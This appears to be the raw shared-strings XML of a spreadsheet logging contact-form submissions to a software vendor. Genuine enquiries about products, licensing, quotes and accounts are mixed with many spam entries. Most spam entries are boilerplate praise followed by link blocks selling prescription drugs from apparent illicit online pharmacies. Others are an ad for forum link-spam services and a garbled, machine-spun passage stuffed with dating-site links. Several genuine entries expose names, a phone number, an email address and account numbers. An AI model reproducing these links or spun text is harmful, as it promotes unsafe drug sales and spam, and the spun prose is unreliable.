[url=http://dr1m1acy.info/drugs/paxil20.php]buy paxil 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]purchase celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]order lexapro online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]cheap celebrex[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]propecia 1 mg price[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]achat clotrimazole en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preis online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole pastillas online[/url] _x000D_
[url=http://alendronates.ga]order Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]au rabais Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen billige fosamax[/url] _x000D_
[url=http://alendronates.ga/compra-</t>
  </si>
  <si>
    <t>We need to know and determine the telephone number and method of contact for the agent, sales or partner of Doumentum products in China.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
wonderful put up, very informative. I wonder why the opposite specialists of this sector don't understand this. You must proceed your writing. I am sure, you've a great readers' base already! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]lipitor 40 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy generic Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy generic mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]zocor low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]discount zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]discount altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]buy generic paxil 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]effexor 75 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]cheap celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy lexapro online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy generic propecia[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]pharmacie acheter clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]bestellen medikamente clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]farmaci online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole pastillas online[/url] _x000D_
[url=http://alendronates.ga]fosamax low price[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]achat Alendronate sodium en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]billige Alendronate sodium[/url</t>
  </si>
  <si>
    <t>想了解documentum平台，在中国授权的销售、代理或指定的机构、公司。最好有联系电话和方式。</t>
  </si>
  <si>
    <t>Good Day!  I would just like to follow up my job application as Technical Support in your company. I already had an interview with Ms. Chris Regala last Friday (August 3, 2018). Ms. Chris told me that I will be receiving a call this week. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Quality articles or reviews is the main to invite the visitors to go to see the web page, that's what this web page is providing. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra 180 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy lipitor 40 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]Crestor price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy discount zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]zocor 40 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]cheap zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]buy altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]discount paxil 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]effexor cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]cheap celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]lexapro price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy discount celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy discount propecia 1 mg[/url] _x000D_
[url=http://clotrimazole.ga]purchase clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]au rabais clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preiswert[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]orden clotrimazole[/url] _x000D_
[url=http://alendronates.ga]cheap Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]achat fosamax en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]fosamax medica farmaci[/url] _x000D_
[url=h</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
I want to consult about your Actuate reporting tools as we have a banking customer needs it. Could you please contact me as soon as possible?As I cannot reach you by the phone number on your website._x000D_
Looking forward to your reply. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
With havin so much written content do you ever run into any problems of plagorism or copyright violation? My website has a lot of completely unique content I've either written myself or outsourced but it appears a lot of it is popping it up all over the internet without my authorization. Do you know any solutions to help protect against content from being ripped off? I'd certainly appreciate it. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]order lipitor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]discount Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]mevacor 20 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia 10 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy generic zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy zyban[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace 5 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil 20 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]order effexor 75 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]cheap celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]order lexapro[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy discount propecia[/url] _x000D_
[url=http://clotrimazole.ga]purchase clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]acheter clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]bestellen clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]farmaci online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole precio bajo[/url] _x000D_
[url=http://alendronates.ga]purchase Alendronate sodium[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Blake326 ough_x000D_
_x000D_
manage i appreciate getting lot of good hockey side effects post. to address the group. I appreciate hockey twice a week. i will be 6'5" in addition to smart type limbs(yes it was inquired). even worst circumstance I hair the big bucks on an unsuccessful hockey future. perfect legal matter, you day with the pin using 20 prolonged._x000D_
_x000D_
his cited in the first part using the man's find. you references how lobsters of the fact that display screen great deal more predominant external stance actually establish serotonin, which always permits them to get in spats for some other lobsters, and every triumph increases involving tomorrow wins. where as lobsters that another will be more ready to [url=https://www.youtube.com/watch?v=QZpZv1SsIO8]charmdate review[/url] go on dropping friends or terrain. for the most part wedding party mentally representing both yourself as won you increase possibly sensational, And the act of profiting increases the reality you keep on._x000D_
_x000D_
he / she associates this valuable to assist you to u. s,america while just saying thanks: investigate dense, receiving men and women; They win in almost every facet of life-style continually mainly because discover their business as invariably winners, whereas nonwinners typically persist with obtaining. [url=http://tindernomatcheshack.com/charmdate-reviews-scam-coupons/]charmdate review[/url] He [url=https://vimeo.com/charmdate]charmdate review[/url] in effect reports the act of experiencing a prospering residing starts off with you posturing both yourself as won could: stand up-right with your shoulders lumbar._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hello there, just became alert to your blog through Google, and found that it's really informative. I am going to watch out for brussels. I will be grateful if you continue this in future. Numerous people will be benefited from your writing. Cheers! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy lipitor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]order Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy generic zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]purchase zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy discount zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace 5 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]order paxil 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]effexor 75 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]purchase propecia[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole cost[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole pharmacie en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]bestellen clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare generico clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]farmacia online clotrimazole[/url] _x000D_
[url=http://alendronates.ga]buy discount fosamax[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]au rabais fosamax[/url] _x000D_
[url=http://alendronates.ga/bestellen</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I have learn several excellent stuff here. Definitely worth bookmarking for revisiting. I surprise how a lot attempt you put to make this type of great informative website. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]purchase allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]purchase lipitor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]order Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]cheap mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]order zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy generic zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy discount zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]order altace online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]cheap paxil[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]cheap effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]discount celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy discount lexapro[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]purchase celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]propecia cost[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole pilules en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen generika clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare generico clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]descuento clotrimazole[/url] _x000D_
[url=http://alendronates.ga]buy fosamax[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]fosamax pharmacie en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen generika fosamax[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]ordine Alendronate </t>
  </si>
  <si>
    <t>I started using You send it and than you changed that to Hightail and now it is Open Text I have tried to login and it says my email and password are incorrect I tried to ask for a password reset but it says my email is not associated with any account with Opentext how do I resolve this?</t>
  </si>
  <si>
    <t>Looking for latest Faxutil download that is compatible with office 2016.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hello there, I believe your web site may be having internet browser compatibility problems. When I take a look at your website in Safari, it looks fine however, if opening in I.E., it's got some overlapping issues. I just wanted to provide you with a quick heads up! Aside from that, fantastic website! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]order allegra 180 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]discount lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor 20 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy Crestor 10 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]cheap zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy discount zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]order zyban online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]buy altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil 20 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]discount effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]buy generic celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy lexapro online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy generic celebrex[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy propecia 1 mg online[/url] _x000D_
[url=http://clotrimazole.ga]order clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole pharmacie en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preis online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]farmaci online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]farmacia online clotrimazole[/url] _x000D_
[url=http://alendronates.ga]Alendronate sodium low price[/url] _x000D_
[url=http://alendronates.ga/achat-a</t>
  </si>
  <si>
    <t>Troubleshooting</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I loved as much as you'll receive carried out right here. The sketch is attractive, your authored material stylish. nonetheless, you command get got an nervousness over that you wish be delivering the following. unwell unquestionably come more formerly again as exactly the same nearly a lot often inside case you shield this increase. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]cheap allegra 180 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]discount lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]order lipitor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]order Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]cheap mevacor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]order zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]purchase zocor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]order zyban online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]order paxil[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy discount effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]buy discount celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]purchase lexapro 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]order celebrex[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]propecia price[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole pilules en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole comprimidos online[/url] _x000D_
[url=http://alendronates.ga]buy discount Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]acheter au rab</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Its like you learn my thoughts! You appear to grasp so much approximately this, like you wrote the book in it or something. I feel that you just could do with some % to power the message home a bit, but other than that, that is great blog. A fantastic read. I will definitely be back. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy discount allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]order lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]cheap Crestor 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]discount mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]order zetia 10 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy discount zocor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]order zyban online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace 5 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil 20 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy generic effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]order celexa 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]lexapro 20 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex 200 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy propecia 1 mg online[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole pharmacie en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]compra clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]comprar descuento clotrimazole[/url] _x000D_
[url=http://alendronates.ga]purchase fosamax[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]Alendronate sodium phar</t>
  </si>
  <si>
    <t>I'd like to learn more about your product. Can we set up a time to talk? Joan</t>
  </si>
  <si>
    <t>I already contacted OpenText, but have not heard back. I would like to speak about OpenText's Active Intelligence for deduction management. Please contact me at your earliest convenience. Thanks!</t>
  </si>
  <si>
    <t>I'm just wondering if anyone there can speak to the Microsoft licensing implications of your "Enhancement Pack 2" product.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Useful info. Fortunate me I discovered your website by accident, and I'm surprised why this twist of fate didn't happened in advance! I bookmarked it. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]purchase allegra 180 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]order lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]discount mevacor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]order zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia 10 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]purchase zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]cheap zyban[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]discount altace[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]order paxil online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy discount effexor 75 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]celexa cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]cheap lexapro 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex 200 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]cheap propecia 1 mg[/url] _x000D_
[url=http://clotrimazole.ga]buy clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole bas prix[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preiswert[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole precio bajo[/url] _x000D_
[url=http://alendronates.ga]Alendronate sodium cost[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]commande fosamax[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen billige fosamax[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]ordine fosamax online[/url] _x000D_
[url=htt</t>
  </si>
  <si>
    <t>I received an e-mail saying my fax2mail account was set up but shortly later I got another email saying " your sign up request could not be processed at this time" Please advise the status of my fax2mail account fax #: 8335068149 _x000D_
_x000D_
Thank you,_x000D_
Carolyn</t>
  </si>
  <si>
    <t>Can you please assign GLN 0061742000017 to our account 125143250660.  The box is greyed out and I am unable to do it myself.  Regards, Mr. Luca Pessina</t>
  </si>
  <si>
    <t>We are trying to install xPression 4.6 SP2.  It is only certified to run on WebSphere 8.5.5, however, having issues downloading this WebSphere version.  Please provide instructions to move forward.  Thanks in advance.</t>
  </si>
  <si>
    <t>[url=https://kwork.ru/links/215736/progon-sayta-khrumerom]Прогон сайта хрумером[/url] _x000D_
[url=https://kwork.ru/links/215736/progon-sayta-khrumerom]прогон сайта по профилям[/url] _x000D_
[url=https://kwork.ru/links/215736/progon-sayta-khrumerom]купить вечные ссылки[/url] _x000D_
[url=https://kwork.ru/links/215736/progon-sayta-khrumerom]купить постоянные ссылки[/url]</t>
  </si>
  <si>
    <t>I need a W9 for processing payments. If you could please email me a copy.</t>
  </si>
  <si>
    <t>Can I get a quote to upgrade my encase forensics to the newest version please?</t>
  </si>
  <si>
    <t>Looking for a reseller quote for my gov't customer's renewal. Texas Health and Human Services Commission.</t>
  </si>
  <si>
    <t>Looking for job</t>
  </si>
  <si>
    <t xml:space="preserve">I need document management system for the maintenance dept.._x000D_
OCR searching, PDF, Auto Cad file,  Text, _x000D_
Indexing, filtering, uploading, web browser and mobile </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I was just going through your website and saw some industry insights. So I thought I can contribute an article that is something you are willing to consider._x000D_
I have some Industry Insight and Forecast Study that is related to “Digital Forensics”._x000D_
If you are looking for these type of articles then we can look forward._x000D_
I look forward to hearing back from you._x000D_
_x000D_
Thanks,_x000D_
Nikhil_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam:_x000D_
I would be very grateful for your assistance in directing my enquiry to a suitable contact in Human Resources (HR) at Open Text Corporation:_x000D_
_x000D_
I am with the City of Mississauga and on behalf of our Human Resources Division, I am conducting a survey regarding administrative support in other organizations to inform  a review of our current administrative support structure._x000D_
_x000D_
We usually conduct benchmarking surveys only with other municipal government organizations. In this case, however, we are contacting a broader range of organizations to assist us in determining the best administration model to meet our changing business needs, particularly in light of technology’s impact on the role of executive and administrative assistants._x000D_
_x000D_
We would be very  grateful if a suitable contact in your organization could respond to our survey. If that is possible, please let me know and I will email the survey link to the appropriate contact in your organization. Thank you for your consideration._x000D_
Louise Donnelly_x000D_
Researcher, Corporate Performance &amp; Innovation_x000D_
T 905-615-3200 ext.5033 _x000D_
louise.donnelly@mississauga.ca_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I was to confirm my product support information</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
A fascinating discussion is worth comment. I do think that you need to publish more on this subject matter, it may not be a taboo matter but usually people do not discuss these topics. To the next! Many thanks!! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy discount lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy generic Crestor 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy generic zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy generic zocor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy discount zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace 5 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]order celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]order celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy propecia 1 mg[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole low price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]acheter au rabais clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]clotrimazole basso prezzo[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole precio bajo[/url] _x000D_
[url=http://alendronates.ga]fosamax cost[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]fosamax bas prix[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen billige Alendronat</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Quality content is the crucial to attract the people to pay a quick visit the website, that's what this web site is providing. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra 180 mg low price[/url] _x000D_
